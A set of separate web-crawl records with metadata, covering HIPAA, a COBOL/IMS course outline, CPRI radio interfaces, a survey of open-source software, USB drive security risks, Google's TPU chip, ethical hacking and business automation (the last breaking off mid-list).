In addition to HIPAA’s portability and simplification pillars, the regulation also includes a provision that aims to address the integrity of publicly-funded healthcare for the uninsured (Medicaid).
"HIPAA requires that you sign this form to consent to us sharing the results of your diagnostic techs with your primary care doctor, since she is out of our network. Unless you consent, we can't send the encrypted message at all." | <urn:uuid:885a9e91-75a9-4ea7-8183-418dc527564b> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/health-insurance-portability-accountability-act | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00294.warc.gz | en | 0.927973 | 219 | 2.96875 | 3 |
Accessing IMS Databases from COBOL
The Accessing IMS Databases from COBOL course details the structure and use of an IMS/DB database. It gives examples of the DL/I data access language and shows how to use DL/I in COBOL programs to read and update IMS data. The concept of backup and recovery, particularly in the context of batch programming runs, is also explained.
COBOL Programmers who need to work with IMS databases.
The learner should have a solid knowledge of IMS database concepts and methods used to access an IMS database. This content can be obtained from the IMS Database course in the IMS curriculum.
- After completing this course, the student will be able to:
- Describe how a COBOL program access an IMS database
- Code a COBOL program to reference and manipulate IMS database data
- Describe how IMS Database recovery is performed following a COBOL program error
Segment I/O Area
Produce a DL/I Call
Coding a Simple COBOL DL/I Batch Program
Extended DL/I Functions
DL/I Command Codes
DL/I Status Codes
How to Delete and Replace Segments
How to Access Lower Levels in a Hierarchy
IMS Backout and Recovery
Recovery Concepts and Procedures
Restart Concepts and Procedures | <urn:uuid:5fc563f1-3c16-4fed-9f49-19782644ef50> | CC-MAIN-2022-40 | https://bmc.interskill.com/course-catalog/COBOL-Accessing-IMS-Databases-from-COBOL.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00294.warc.gz | en | 0.797172 | 339 | 2.875 | 3 |
Common Public Radio Interface, or CPRI in short, is a standard initially developed by Nokia Siemens. Soon it was joined by Ericcson, Huawei, NEC and Alcatel-Lucent, together comprising the five largest telecommunication equipment manufacturers in the world. With the inception of powerful handsets, wireless technologies have become more prevalent and consumer demand for high speed data fierce. Wireless companies are constantly under pressure to increase capacity and equipment suppliers to come up with novel methods to efficiently transport RF signals.
Traditionally, telecommunication equipment manufacturers like Ericsson and Alcatel-Lucent have sold equipment called Base Stations to wireless carriers. These are RF processing units that act as a gateway between carriers’ macro network (backhaul) and wireless fronthaul to consumer handsets. These analog setups have proven to be costly due to the large amount of energy, space, equipment and labor required to deploy. The largest associated cost is processing the high powered analog RF signals coming out of Base Stations. This is where CPRI comes in play.
Rather than transporting RF signals in analog form, equipment vendors offer a new solution: transporting wireless signals digitally as part of a fronthaul wireless network, commonly known as DAS (Distributed Antenna System). CPRI then, is a set of specifications set forth by equipment manufacturers in an effort to standardize the protocol between radio equipment control and radio equipment.
To make things easier to understand, RF base stations have been filling the role of radio equipment control and RF processing. They also conduct analog-to-digital (A/D) and digital-to-analog (D/A) conversions, leaving the distribution of fronthaul RF signals to 3rd party vendors. The inception of the CPRI standard means Base Stations can now concentrate on performing tasks like directing wireless traffic between carriers’ fronthaul and backhaul networks. RF processing and A/D processing are done at remote radio nodes. These nodes are now being connected to radio equipment control via fiber optic or Ethernet cable.
With the inception of CPRI, typical wireless fronthaul networks now resemble your everyday LAN (Local Access Network), with standard point-to-point, star, and chained configurations feasible in the deployment of radio equipment. Obviously, RF balancing and propagation requirements remain among remote radio nodes, but the use of passive auxiliary components has been greatly reduced.
For more CPRI related documents please visit DASpedia Vault
DASpedia is currently seeking written contributions to our growing knowledge base of DAS & Small Cell technologies. Articles, white papers and presentations are all valid considerations. Product data sheets are also welcome. Editorial credit will be given. If you have something you or your organization would like to share, please feel free to submit it to email@example.com | <urn:uuid:decae86d-3efc-4977-aa35-e1a4db9a9a64> | CC-MAIN-2022-40 | https://daspedia.com/archives/2115 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00294.warc.gz | en | 0.939107 | 576 | 3.234375 | 3 |
It is easy to see the impact that open source software has had on the developer community. A Google search for “open source” turns up over nineteen million results. That’s more than a similar search for “Oracle”, and nearly one-fifth as many as for “Microsoft”, the king of proprietary software.
This article will describe what open-source software is, and examine a few of the products that are out there on the open-source landscape.
What Is Open-Source Software?
According to the Open Source Initiative, Open-source software is any software that is distributed to the developer community with the source code. Traditionally, software vendors distribute only the binaries for their products, leaving developers in the dark as to the inner workings of the products they use. Because open-source software vendors distribute the source code, developers can readily improve the product by creating patches for problems, or by making enhancements.
Although most open-source software is free to the community, there are sometimes strings attached. Let’s take a look at the most common types of licensing for open-source software.
GNU General Public License (GPL)
Under the General Public License, or GPL, the licensee is free to distribute or modify the software product, provided that the modifications, both in binary and source code form, remain free to the public under the terms of the GPL. In addition, the licensee must provide all build scripts, interface definitions, and installation scripts necessary to compile and install the program.
The GPL makes no provision for a warranty of any kind, and this fact must be displayed prominently in the source code, as well as on the user interface of the program, if applicable.
Works that contain the original software, or are derived from it, must fall under the GPL. Thus, no one is allowed to create proprietary software based on a GPL-licensed product, ensuring that free software remains free.
Anyone who modifies and redistributes software under the GPL must prominently display the fact that the new version is different than the older version. Thus, if a new version of the product is not up to par, that fact won’t tarnish the reputation of the original product.
GNU Lesser General Public License (LGPL)
The Lesser General Public License (LGPL), the successor to the GNU Library Public License, is the GPL equivalent for open-source software libraries. Under this license, the libraries themselves fall under provisions similar to the GPL. The libraries themselves, and any works directly based on them, in both source code and binary form, must be freely available to the public. However, unlike the GPL, programs that simply use the libraries can be excluded from the terms of the LGPL, and can be proprietary.
Because LGPL is less restrictive, free software developers who license software under it’s terms enjoy less of an advantage over those who are paid for their software. However, LGPL still provides some benefits to the open-source community. First, by providing libraries under LGPL rather than GPL, free software developers can encourage the use of their libraries as a default standard in the industry. Secondly, encouraging the use of the libraries may help to speed the growth of the use of other free software, such as operating systems, even by paid software vendors.
Mozilla Public License
The Mozilla Public License, or MPL, is very similar to the GPL in spirit, with a few exceptions. First of all, this license is more precise, from a legal standpoint, and addresses specifically some areas, such as intellectual property rights, license termination, government licensing, and liability issues, that are not explicitly mentioned in the GPL.
Unlike GPL, the MPL allows the licensee to create larger works that include the licensed software, while still allowing those programs to be distributed for payment, as long as the portion of the code licensed under Mozilla is still covered under the MPL..
Many developers are now embracing this more strictly-defined license for their open-source software, rather than continuing to use the GPL. The clause allowing larger works using the licensed product, as with the LGPL, is a boon for developers wishing to make their products a defacto industry standard.
Other Open-Source Licenses
There are many other licenses available to those who create open-source software. The BSD and MIT licenses were created to address products developed at the University of California and MIT, respectively. These licenses are very similar, and are available through the OSI as templates for those wishing to use them for their own open-source products.
Other licenses address open-source products based on software written by particular organizations. For example, the Apache and IBM licenses cover software written for the Apache Foundation and IBM, or products utilizing software developed by them.
The bottom line is that most open-source software is free, as long as you distribute any modifications you make under the terms of the original license agreement, and no warranty is provided, unless otherwise stated, by the developer of the product.
How Do Open-Source Developers Make Money?
If open-source software is free, how can any software developer hope to make money on it? They do so by providing value-added services and products that are not covered by the original licensing agreements.Because open-source software is usually distributed “as-is”, software developers can earn income by providing warranty coverage for the products they develop.
Some vendors provide support for open-source products for a fee. Many provide various levels of support, just as commercial software vendors do, ranging in price and quality from email-only support up to on-site consulting and troubleshooting.
Open-source software is largely developed by volunteers. Developers are notorious for neglecting documentation, besides that found in the source code. Many open-source software developers provide excellent documentation for a nominal fee. Most provide documentation in electronic form, but some will provide hard-copy versions for a larger fee.
Although open-source licenses guarantee licensees the right to receive source code for the products licensed, they do allow licensors to charge for such distributions. Most open-source software, and it’s associated source code, can be downloaded from the Internet free of charge, but there are many vendors who will provide distributions, sometimes with additional documentation or other bonuses, on CD for a fee. Now that we have defined open-source software and discussed how it is licensed, let’s have a look at the kinds of products available to developers.
By far, the eight-hundred-pound gorilla of the open-source operating system community is Linux. This UNIX-like operating system is estimated to have up to 27 million users worldwide, according to the OSI, although it is practically impossible to verify exactly how many users are out there. Developed by Linus Torvald as an academic project in the early 1990s, Linux has now grown into a corporate tool used by fortune 500 companies, and distributed on servers by prominent server vendors, such as IBM.
Linux comes in many flavors, including Redhat, Mandrake, Slackware, Turbo Linux, SuSE, and others. By far, the most popular version is Redhat, which is widely distributed by commercial software vendors. This flavor of Linux, unlike some of the others, offers excellent support and documentation, and enjoys the largest following of any other Linux flavor.
Remaining true to it’s MINIX roots, Linux still has a command-line interface; however, open-source desktops, such as Gnome and KDE, that provide Windows-like functionality are available.
With the advent of open-source productivity tools, such as StarOffice and OpenOffice, Linux is even beginning to penetrate the desktop market. The number of applications available for Linux is growing, attracting many who were formerly Windows users out of necessity, but who can now find the programs they need in the open source community.
One downside to Linux, according to Internet Week, is the lack of quality development tools for the platform. According to a survey by research firm Evans Data Corp., 25% of developers surveyed said that critical development tools, such as compilers, are only adequate, or need work, on Linux. Despite this, Linux’s stability and dependability have attracted a huge following.
For more information on Linux, visit http://www.linux.org.
BSD is a UNIX-based operating system descended from code originally written at UC Berkeley. Although it is not as popular as it once was, due to the arrival of Linux, BSD and it’s many flavors are still a notable presence on the open source scene.
Various flavors of BSD still exist, including FreeBSD, NetBSD, OpenBSD, and Darwin. The momentum behind BSD has decreased sharply due to the disappearance of several of the companies that provided support and patches for the various operating systems. Also, the popularity of Linux has led more developers to write code for that operating system, leaving BSD languishing.
For more information about BSD, visit http://www.bsd.org/
Web Servers and Application Servers
Apache HTTP Server
The Apache HTTP server is, by far, the most popular web server on the World Wide Web. According to a Netcraft survey (http://news.netcraft.com/archives/web_server_survey.html), Apache leads the market with over 67% of web servers running Apache. This compares with only 21% for Microsoft, 3% for the Sun One server, and 1.6% for Zeus.
Apache was originally created at the National Center for Supercomputing Applications, under a different name. When development on that HTTP server stopped in 1994, some of the major players in the project met to apply patches to the product and create a more stable release. This new release, which branched from the original NCSA server, became the most widely-used server on the web today, and is one of the open source movement’s biggest success stories.
For more information about the Apache HTTP server, visit http://www.apache.org/.
With the arrival of Java servlets and JSP on the scene, it was quite natural that the people who brought you the Web’s most popular web server would also build a servlet engine. Tomcat, which is Sun Microsystems’ acid test for the servlet and JSP specification, is a part of the Apache Jakarta Project, a project dedicated to providing open-source, Java-based software solutions. Tomcat is available as a module that is pluggable into the Apache modules framework, but may also be used for standalone servlet and JSP development. Tomcat does not support the full J2EE specification, but it is sometimes used as the default servlet container for other open-source products that do support the full spec.
For more information about Tomcat, visit http://jakarta.apache.org/tomcat.
Jboss is an open-source application server that supports the full J2EE specification. As mentioned above, Jboss incorporates the Tomcat servlet container as part of its code. For a closer look at Jboss and its features, see “Jump Into Jboss” on this site, or visit http://www.jboss.org/.
Most enterprise solutions require some sort of database to store their data. However, the high licensing fees, complexity, security issues, and high cost of database administration for commercial databases, such as Oracle and MS SQL Server, have made open-source alternatives attractive to a growing number of businesses. The two major players in this arena are PostgreSQL and MySQL, which we’ll examine in the following sections.
PostgreSQL is the open-source descendant of the Postgress database, created by the University of California at Berkeley. It incorporates many features found in commercial databases that developers have come to expect, such as complex queries, triggers, foreign keys, views, transactional integrity, and replication. The database can also be extended by allowing developers to define new data types, functions, operators, aggregate functions, and even procedural languages. This last item is perhaps the most intriguing for developers accustomed to developing in PL/SQL, TCL, PERL, and Python, because PostgreSQL allows stored procedures to be implemented in these languages. Although all of the features of each language are not included in PostgreSQL, the feature sets for each are still powerful, familiar to those who have used them before, and, of course, always improving.
For more information about PostgreSQL, visit http://www.postgresql.org/.
MySQL is a powerful but simple database geared toward applications with high transaction volumes and large quantities of data. This performance and scalability, however, come at the price of feature richness. MySQL does not currently support stored procedures or triggers, although both features are slated for version 5.0 and 5.1, respectively. Also, MySQL constrains developers to the SQL-92 specification, which lacks some of the SQL capabilities found in commercial databases.
The administration for MySQL is very simple. Administration is done within the MySQL command-line client, which is similar to SQL*Plus for Oracle. Also, numerous command-line utilities exist for performing various administrative functions, such as loading data, and repairing and analyzing tables.
Although MySQL lacks some features, it is capable of handling large volumes of data. According to the latest MySQL documentation, the database has been used in production with thousands of tables and millions of records without significant performance issues.
For more information about MySQL, visit http://www.mysql.org/.
Source code control is always an integral part of any development effort. The Concurrent Versioning System, or CVS, available at http://www.cvshome.org/, is the open-source standard for source code control. Virtually all open-source software projects make their code available via CVS repository.
CVS runs on numerous platforms, including Redhat Linux, Win32, Mac OS/X, and some versions of VMS. There is a cross-platform Java version available, as well.
CVS is usually used as a command-line tool, but various open-source GUI interfaces exist for several platforms. Also, CVS can interface directly with Ant (see below for details).
Who among us hasn’t struggled with “make” files? The amount of time spent figuring out whether a command didn’t execute because of a pesky leading space must have cost companies millions. In response to this problem, James D. Davidson, original author of Apache Tomcat, created a cross-platform build tool called Ant (“Another Neat Tool”) to overcome the problems with “make”, “jam”, and their cousins. The first release of Ant, version 1.1, came out in July of 2000, and has been a standby for Java developers ever since.
Ant automates the build and deployment process for Java developers, allowing tasks such as directory cleanup and creation, code check-out, compilation, file copying, JARring and WARring files, and even running Junit test cases. The complete functionality of Ant is too extensive to discuss here, but visiting http://ant.apache.org / will provide more information. If the functionality provided in Ant is not sufficient, Ant allows developers to create their own custom tasks.
Eclipse is a cross-platform, Java-based development environment. Although the creators of Eclipse originally developed this environment with Java in mind, Eclipse provides a plug-in interface that allows the IDE to be used for other languages, as well. Currently, the official Eclipse Tools Project has plug-ins for C/C++, COBOL, and, of course, Java, but a host of community-based plug-ins exist for other languages and development tools, as well as for JSP, servlet, and Struts development.
Currently, Eclipse is available on various Linux flavors, Win32, and Solaris, but, provided that a Java Virtual Machine exists for your platform, you may still be able to use this IDE.
PERL, sometimes called “the duct tape of the Internet”, is perhaps the granddaddy of all open-source programming languages. It was developed back in 1987 by Larry Wall. Now, according to http://www.perl.org, PERL has over a million users, and is a widely-used tool for Common Gateway Interface (CGI) scripting, which allows web servers to extend their processing capabilities beyond simply serving up web pages.
PERL is an interpreted language, and thus can run on any operating system that has a PERL interpreter. It includes many useful features, including extremely powerful regular-expression and string manipulation functions, database connectivity, and the ability to link to C/C++ native libraries. Developers can write PERL programs either procedurally, or using the object-oriented paradigm.
Python is a cross-platform, object-oriented, extensible scripting language used widely for Internet development. It supports features such as regular expressions, advanced string processing features, Internet protocols (HTTP, SMTP, POP, and so forth), unit testing, logging, Python language parsing, and operating system calls in the standard language libraries. The language itself is extensible in either C or C++.
Python’s author, Guido van Rossum, originally wrote Python in response to complaints he had about an interpreted language he used back in 1989. Subsequently, he began development of the Python programming language to address these complaints. The first official release of Python came out in 1991, and has gained popularity as a CGI language in recent years.
PHP is a powerful, object-oriented scripting language primarily used for generating dynamic web pages. The language combines syntactic features from C, Java, and Perl, and has extensive string processing, Internet protocol, and databases. PHP is also easily extendable, with thousands of modules available in the PHP community.
PHP was originally developed as a Perl extension by Rasmus Lerdorf to fulfill his own personal web site needs. After some additional development, Lerdorf realized the potential for the language, and, along with others, began the development of PHP as it exists today. According to http://www.php.net/, PHP powers millions of Internet sites, accounting for up to 20% of all sites on the Web.
Unit testing has always been a necessary evil for software developers. Now, Junit, a unit-testing tool for Java developers, can take some of the drudgery out of this important task.
Junit is basically a Java framework for creating assertions (test cases), sharing test data, running test suites automatically, and verifying the results. By extending Junit classes, developers can test their business logic by simply running the Junit test suite, just like any other Java program. Since developers code the expected outcome into each test case, there is no human intervention required to determine which test cases passed, and which failed.
For more information about Junit, visit http://www.junit.org/.
No matter how carefully development is done, bugs always creep into the system. Bugzilla is an open-source defect tracking system based on Perl that incorporates many of the features of expensive commercial products. Some features include inter-bug dependency graphing, advanced reporting capabilities, a stable RDBMS back-end, support for email, XML, console, and HTTP APIs, and integration with various version management systems, including CVS.
Bugzilla still has some challenges ahead. Most notably, future enhancements include adding more flexibility to the bug reporting portion of the application, as well as addressing performance problems in a few areas. Still, Bugzilla is a robust, widely-used defect tracking system that is fast becoming an industry standard.
For more information about Bugzilla, visit http://www.bugzilla.org/.
While Junit is used to test business logic, Cactus, part of the Apache Jakarta project, is used to test server-side Java code, such as servlets, JSPs, EJBs, etc. This framework actually extends the capabilities of Junit, so that appropriate HTTP requests are sent to the server, where the processing occurs, and is then sent back to Cactus as server-side output. Developers must extend the Cactus classes, as well as writing Junit test suites, to perform their tests.
For more information about Cactus, visit http://jakarta.apache.org/cactus.
The OpenOffice productivity suite is an open-source alternative to the Microsoft Office productivity suite. Although the default format for OpenOffice documents is XML, OpenOffice can read and write documents in MS Office-compatible formats, as well as exporting to PDF and Multimedia Flash formats. OpenOffice is also compatible with Sun Microsystems’ StarOffice suite, a commercial offering based on OpenOffice 1.1 with a few more bells and whistles.
OpenOffice includes a word processor, spreadsheet, presentation tool, drawing tool, and a database tool. Additionally, OpenOffice supports a variety of languages, and allows vertical and bi-directional writing, which are common in languages such as Hebrew and Japanese.
OpenOffice also supports user macros, which can be used to perform simple, repetitive tasks. For more complex tasks, users can extend OpenOffice with the OpenOffice SDK, using a wide variety of programming languages, such as C++, Java, Basic, OLE, and XML. Third-party vendors can further extend OpenOffice’s capabilities by implementing tools using the OpenOffice Add-On Framework.
Mozilla is arguably the most popular open-source web browser/email program. It offers features similar to the Netscape Communicator suite (in fact, Netscape 7.x is based on Mozilla). These features include a web browser, email and newsgroup reader, web page composer, address book, and chat program.
Mozilla Firebird is another open-source browser, based on the Mozilla code base. Firebird is not simply a standalone version of the Mozilla browser included in the Mozilla suite; the user interface, as well as some features, are significantly different.
Likewise, the Mozilla Thunderbird email reader is an open-source mail reader based on the Mozilla codebase. The user interface and customization options are different than those offered by the Mozilla email client.
For more information about these products, visit http://www.mozilla.org/.
Amaya is an open-source browser/editor offered by the W3C. The project began as an HTML 4.0/CSS browser and editor, but has since expanded to include XML, XHTML, MathML, and SVG. The ultimate goal is to incorporate as many technologies endorsed by the W3C as possible into the product. For more information about Amaya, visit http://www.w3.org/amaya.
In this article, we have discussed what open-source software is, what’s out there, and where to find it. The open-source software products discussed here are only the tip of the iceberg. There is a vast world of open-source software out there to be explored, free for the taking. | <urn:uuid:8f0ca0cd-31a6-4f87-b623-6148721d9fce> | CC-MAIN-2022-40 | https://it-observer.com/surveying-open-source-landscape.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00294.warc.gz | en | 0.925639 | 4,879 | 3.390625 | 3 |
Tiny, almost undetectable and with almost limitless powers to wreak havoc on your network: USB drives are like thousands of back doors through which malicious code can sneak in and confidential data can gush out whenever your back is turned.
The rise in popularity of USB flash memory drives over the last few years has been as inexorable as their falling prices. Instantly recognized by Windows XP or Mac OS X without the need to install any drivers, they can be used to copy gigabytes of data from your network, or to introduce applications, data, viruses and malware in a matter of minutes. In fact it’s not just flash drives that are a problem. Any MP3 player with a USB interface – and that includes almost all players, including Apple’s iPod – can also be used as a data storage medium, with the potential to hold tens of gigabytes of information which can be transferred to or from the network. IDC predicts that sales of mini-hard disks – most of them portable devices and many built in to MP3 players – will increase by 500 per cent to 100 million units a year by 2008.
Since anyone can install a USB drive by simply plugging it in to a USB port – you don’t need to be an administrator in Windows XP or 2000 – and since USB devices can’t be managed using Group Policy, this presents a very serious security problem from a network administrator’s point of view.
Here are the main potential problems that USB devices present:
Viruses. For the last ten years or so, most viruses have come from the Internet, and network administrators have been able to confront them using a variety of methods including email scanners and firewalls to block suspect sites. But USB drives make it easy to bypass these methods by introducing software and data straight on to network PCs
Other malware. Because of their vast capacity, it’s easy to use USB devices to introduce pornography and other inappropriate video clips, illegally copied MP3 files, bandwidth hogging peer to peer file swapping applications and spyware on to the network.
Data theft. Again because of their capacity, USB devices are ideal for copying price lists, entire customer databases, product designs and any other confidential information. Employees armed with a keyring-sized flash device could walk out of the office with most of a company’s information assets on a tiny and almost undetectable device.
Loss of confidential information. In many organizations, employees find it tempting to load data onto USB drives to take home with them to use on a desktop machine rather than carrying a laptop between work and home. But being much smaller, they are far more likely to drop out of a bag or pocket unnoticed. Consequences can range from inconvenience and bad publicity to serious commercial setbacks or even regulatory penalties and legal action.
So what can be done?
For organizations where the primary concern is theft of data by employees, it’s necessary to look to third party security software. Products such as SecureWave’s Sanctuary Device Control give network administrators complete control over every I/O port on every Windows PC on the network on which the Sanctuary client software is installed. Using a centralized data base, it’s possible to grant permissions for particular users to use specific devices – the secure USB drive issued by the IT department, for example. For compliance and security purposes each data transfer can be logged, so administrators know which user is copying data and when, and an exact copy of the data transferred can also be stored. The software is relatively inexpensive – about $30 per user – and for some organizations it may be worth investing in. It is up to you, however, to determine that the software you select is secure enough and can be relied upon not to be easily bypassed.
This sort of software may not suit your organization, or it may be that you are more concerned about the accidental introduction of viruses onto your network than data theft, so it’s worth examining other solutions. These are likely to involve many parts of the company including IT, HR, and possibly even the legal department.
The best way to tackle the USB drive problem is probably to recognize that many of the people who use USB storage devices are not doing so maliciously – they just see them as neat gadgets for moving apps and data around. So educating users about the dangers of USB devices – viruses, data loss and so on – should be a first priority.
Since USB flash memory sticks are convenient, the chances are that some employees will still want to use them, even when they are aware of the risks. It is probably better to control rather than prohibit their use by making them available to those that really benefit from them through the IT department. There should then be a clearly stated corporate policy indicating that employees’ own USB drives, including MP3 players, should not to be connected to corporate PCs – only drives issued by the IT department should be permitted. The legal and HR departments may have to become involved if rules about employees’ own USB drives are to be enforced, but it is probably impractical to try to prevent employees from bringing their iPods in to the workplace to listen to at lunch time just because they could connect them to their PCs.
How does this help? Because the IT department can issue flash drives such as Lexar’s JumpDrive Secure which offer password protection and 256 bit AES data encryption so that even if the device is lost or stolen, the data stored on it is inaccessible. For greater protection, drives which include a biometric fingerprint scanner are also available. Staff that are issued with USB drives to transfer data should also be educated to scan them for viruses regularly.
Deciding exactly what steps to take to minimize the risks posed by USB drives is a tricky task, and there is no one-size-fits-all solution. Every organization’s needs are different, and the costs and benefits of particular measures have to be assessed individually. As USB drives become ubiquitous it seems inevitable that most operating systems will, in the future, provide some way for network administrators to control their use quickly and easily. But until then these handy little devices will continue to be a security risk and should not be ignored. | <urn:uuid:c3ff0325-2a73-4db3-8782-94b0372bcc9e> | CC-MAIN-2022-40 | https://www.enterprisenetworkingplanet.com/management/close-your-networks-portable-back-door/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00294.warc.gz | en | 0.955476 | 1,267 | 2.59375 | 3 |
Last October, a computer system beat a professional human player at the ancient Chinese board game Go. The AI system, AlphaGo, was built by Google and trained using machine learning techniques.
Google built the hardware that powered AlphaGo in-house, as it does with most of its infrastructure components. At the core of that hardware is the Tensor Processing Unit, or TPU, a chip Google designed specifically for its AI hardware, the company’s CEO, Sundar Pichai, said from stage this morning during the opening Google I/O conference keynote next to Google headquarters in Mountain View, California.
This is the first time Google has shared any information about the hardware backend that powers its AI, which will play a central role in the company’s revamped cloud services strategy, announced earlier this year. TPUs are part of the infrastructure that supports its cloud services.
The company has been running them in its data centers for about one year, Norm Jouppi, distinguished hardware engineer at Google, wrote in a blog post. The chips run as accelerators, providing "roughly equivalent to fast-forwarding technology about seven years into the future (three generations of Moore’s Law)," he wrote.
Pichai shared little detail about the TPU, saying only that its performance per watt was “orders of magnitude higher” than any commercially available CPU or GPU (Graphics Processing Unit):
Google CEO Sundar Pichai on stage at Google I/O 2016 (Source: Google I/O live stream)
“Tensor Processing Unit (TPU) is a custom ASIC for machine learning that fits in the same footprint of a hard drive, and was the secret sauce for AlphaGo in Korea,” Google said in an emailed statement.
TPU gets its name from TensorFlow, the software library for machine intelligence that powers Google Search and other services, such as speech recognition, Gmail, and Photos. The company open sourced TensorFlow in November of last year.
The chip is tailored for machine learning. It is better at tolerating "reduced computational precision," which enables it to use fewer processors per operation. "Because of this, we can squeeze more operations per second into the silicon, use more sophisticated and powerful machine learning models and apply these models more quickly, so users get more intelligent results more rapidly," Jouppi wrote. | <urn:uuid:aea0f76c-29d9-451e-a027-90c61e1492a2> | CC-MAIN-2022-40 | https://www.datacenterknowledge.com/archives/2016/05/18/google-alphago-powered-custom-ai-chip/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00294.warc.gz | en | 0.956563 | 489 | 2.53125 | 3 |
A vibrant, connected community of ethical hackers has an important role to play in the increasingly complex fight against cyber-crime, explains Brigitte d’Heygère, Vice President Security & Consulting Services at Gemalto
Buried treasure is not just the stuff of fiction and legend. For at least some of our ancestors, it was quite simply the most effective means of protecting prized possessions from unwanted attention. And whilst the methods of defense have inevitably evolved over time, the basic game of cat and mouse between legitimate owners and those who seek to steal from them has never gone away. Of course, in an era of digitalisation, the treasure being fought over is often no longer physical. Harvesting personal data, attacking critical national infrastructures and disrupting online services are just some of the aspirations of today’s cyber-criminals. In common parlance, these 21st century bandits are often lumped together under a single, catch-all label – hackers. Equally, there is a widespread assumption that our security will be ensured simply by the application of ever-more sophisticated technologies. However, in reality, this only tells half the story. Keeping digital resources safe from cyber-attacks ultimately means harnessing the ingenuity and expertise of a diverse global family of IT and digital security specialists. What’s more, at the heart of this community is an often-overlooked citizen army – made up of hackers with a very different ethical agenda to those who usually hit the headlines.
A shifting security landscape
Whilst the science of cryptography has a history stretching back almost as far as mathematics itself, prior to the advent of the internet, it was generally the preserve of select sections of society, such as governments and the military. But with digitalisation came a paradigm shift. In a permanently connected world, the security perimeter has become highly scalable and volatile, the attack surface exponentially bigger. Instead of simply protecting a physical memory unit or processor, for example, complex networks of computers and servers, as well as the constant flow of information between them, needs to be defended.
Machine learning and Big Data are changing the rules, again
What’s more, the world continues to spin faster. The digital footprints that individuals and organisations leave in cyberspace are getting deeper. Furthermore, the advent of machine learning has now made it easier for malevolent forces to compromise and reap this Big Data. But, at the same time, machine learning also represents a potentially powerful defense tool. In particular, its ability to predict situations and scenarios based on accumulated evidence can play a key role in detecting vulnerabilities and pre-empting attacks. A new front in the cyber-security arms race has opened.
Next on the horizon – quantum computing
As if the implications of machine learning and Big Data were not enough to contend with, yet another technology revolution is on the horizon. It comes in the form of quantum computing, which is set to redefine the limits of data processing power. In doing so, it will undermine the fundamentals on which many of our currently ‘unbreakable’ cryptographic codes are built. For the security industry, that obviously means another profound challenge: the creation of new, quantum-resistant cryptographic algorithms.
Harnessing the hackers
Given these rapidly shifting sands, the security sector has no choice but to evolve fast. And one of the most significant ways that this is being achieved is through closer collaboration with, and between, the good guys: the ethical hackers.
In terms of harnessing this key resource, we have already seen a major change in the landscape. Not so long ago, security experts were almost invariably drawn from the world of academic research. Consequently, cryptographic skills were concentrated in the hands of a relatively small circle of people, and typically paid for by governments. However, the ubiquity and accessibility of powerful IT systems has swiftly democratised the art of hacking. Subsequently, an extended community has developed, embracing both the public and private sectors, employed professionals, freelancers and talented amateurs. Moreover, whilst media attention, and consequently public fears, have tended to focus on the malevolent hackers, the energy, dynamism and co-operative approach of this ethical movement deserves to be recognised fully – and utilised as effectively as possible.
Cybersecurity Act will set new standards
There is growing recognition that, to stay one step ahead of the criminals, this exchange of ideas needs to be as comprehensive as possible. Within digital security companies, talented and dedicated digital security experts already represent a vital force. They invest their energy for good, continually and rigorously testing systems and products to identify and address any potential weak spots. By actively encouraging collaboration with the wider ethical hacking family, we are now forging an even stronger alliance between all those people who share not just the right skills, but the right principles too. Looking ahead, changes in the regulatory framework are only likely to make this approach even more worthwhile. In Europe, the forthcoming Cybersecurity Act will introduce a single means of security certification for ICT products, with levels ranging from ‘basic’ to ‘high’. Authorised hacking of products to test for any vulnerabilities will clearly be an important part of the process.
Listening, learning, sharing
To this end, the work of the ethical hacking community is being channeled not just by informal interaction, but also major organised events and conferences. Better known examples of these include Black Hat, “Nuit du Hack”, CHES Conference, DEF CON, AppSec and Pwn2Own. Notably, many play hosts to hack contests (aka bug bounties), which challenge participants to find vulnerabilities in a system, and a means of exploiting it, and then reward the team that is first to do so.
Time to bury the stereotypes
Stereotypes are invariably difficult to dispel. But, in the case of the hacker, we should at least try to change the perception that the term applies exclusively to malevolent loners, organised criminals and the murky world of state-sponsored cyber warfare. Today, a very different type of hacker is also hard at work, helping to protect us from the manifold threats that inhabit the dark corners of cyberspace. Moreover, as the systems that must be secured become more complex, so are the skills needed to defend them. Helping to build a truly diverse ethical hacking community and fostering dialogue with the principled experts working inside the digital security industry, should therefore be an imperative for all interested parties.
To this end, reclaiming the term hacker from the bad guys, and giving this vital and dynamic community due credit are more than symbolic gestures. Beneath it lies an understanding that, in an ever more digitalised world, greater safety and security remain rooted in the most positive elements of the human character. | <urn:uuid:2aecbaba-b20a-49be-bb9f-b267b7051677> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/articles/in-praise-of-the-hackers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00494.warc.gz | en | 0.950806 | 1,376 | 2.625 | 3 |
Automation in business
Automation: the technique of making an apparatus, a process, or a system operate automatically
We set up our “Out of Office” notice to let people know that we cannot respond to email while we are away for vacation. This is the most basic form of automation that we perform in our businesses. Other examples include:
- Setting up systems to run reports at certain intervals and delivering them via email.
- Set up Outlook rules to file content automatically.
- Setting our phone system on night mode manually or via a schedule to let customers continue to interact with our business while we are away.
- For businesses with key card access, locking and unlocking the doors via a schedule.
- We can schedule Facebook to post content in the future down to the exact minute we specify.
There are a lot of things we are currently automating in our businesses, but what is next?
Tesla Motors has significantly moved autonomous driving forward with Autopilot. At its most basic level, driving is a process. Tesla has taken that process along with a myriad of sensors and controls and built logic to have them all function together seamlessly. This is much simpler than it sounds, but it is happening.
If you have a repeatable process that is already in place, you may want to think about leveraging your current technology to take the next step towards automating that process.
What should be automated:
- Tasks that are labor intensive and provide no value add from a customer point of view:
